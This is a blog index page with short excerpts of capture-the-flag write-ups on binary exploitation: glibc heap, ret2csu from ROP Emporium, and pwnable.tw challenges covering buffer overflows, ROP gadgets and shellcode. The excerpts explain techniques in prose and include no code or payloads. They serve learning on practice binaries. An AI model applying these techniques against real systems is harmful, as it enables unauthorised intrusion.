Categories
advanced glibc heap

one_byte

Ramblings A while back I took an online class on glibc’s heap. It’s taught by Max Kamper, the same guy who did ROP emporium, who is an amazing teacher. I’d highly recommend this class if you’re interested in the glibc heap, or how heaps work in general. The last challenge of part one took me […]

Categories
ROP ROP emporium

ret2csu

This was the last challenge from Max Kamper’s ROP Emporium. It wasn’t especially hard, but it teaches a strategy that’s extremely useful for ROP attacks that (supposedly) works universally on most Linux binaries. To start, all ROP emporium levels have the same basic buffer overflow to overwrite the return address. The site says the objective […]

Categories
basic pwnable.tw

calc

This program lets you do math to numbers. It seems to be more secure then the last: Note the stack canaries; unless we have a leak, we can’t just overflow everything up to the return address. We also can’t jump to the stack. However, notice that this binary doesn’t have PIE enabled, making ROP gadgets […]

Categories
basic pwnable.tw

orw

This binary gives up it’s restraints in the description: If we decompile the binary with ghidra, we can see it literally just accepts and calls our shellcode. To figure out how linux syscalls work in assembly, you can use this for reference. Just put the correct value in each register then call int 0x80, and […]

Categories
basic pwnable.tw

start

This is the first challenge of pwnable.tw. Fitting to it’s name, it requires some basic knowledge of buffer overflows and x86 assembly. First, let’s see what kind of security it has built in: Notice how the stack is executable, and there’s no stack canaries. This will come into play later. We can disassemble the program […]